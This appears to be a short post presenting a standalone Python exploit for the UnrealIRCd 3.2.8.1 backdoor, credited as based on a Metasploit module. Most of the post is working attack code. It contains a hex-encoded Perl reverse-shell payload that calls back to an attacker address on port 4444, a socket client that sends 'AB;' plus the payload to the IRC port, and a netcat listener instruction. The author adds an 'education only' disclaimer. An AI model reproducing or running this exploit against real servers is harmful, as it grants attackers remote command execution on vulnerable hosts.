unreal ircd 3.2.8.1

unreal IRCD 3.2.8.1 standalone exploit based on Metasploit

*All credit go to Rapid7

This is a Unreal IRCD 3.2.8.1 backdoor command execution, written in Python, based on an exploit of Metasploit Framework

You still need msfvenom to generate the payload.

This shit is too old to cause any real damage, but still —

—Disclaimer: For education purposes only. Use it at your own risk, don’t blame me for anything.


#Open a netcat listener before running this code: nc -nlvp 4444
#Or you can use exploit/multi/handler of metasploit framework
#to listen to the reverse shell

import sys,socket
target_ip="192.168.142.129" #change this
target_port=6667 #dont change this

#payload: cmd/unix/reverse_perl
#encoder:cmd/perl
#Change this payload before running this exploit
buf =""
buf += "\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20"
buf += "\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74"
buf += "\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61"
buf += "\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65"
buf += "\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24"
buf += "\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28"
buf += "\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b"
buf += "\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e"
buf += "\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74"
buf += "\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64"
buf += "\x64\x72\x2c\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31"
buf += "\x34\x32\x2e\x31\x32\x38\x3a\x34\x34\x34\x34\x22\x29"
buf += "\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65"
buf += "\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66"
buf += "\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77"
buf += "\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24"
buf += "\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73"
buf += "\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27"

shellcode= buf

#TCP client
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#connect client to target
client.connect((target_ip,target_port))

#send shellcode to target
client.send("AB;"+ shellcode +"\n")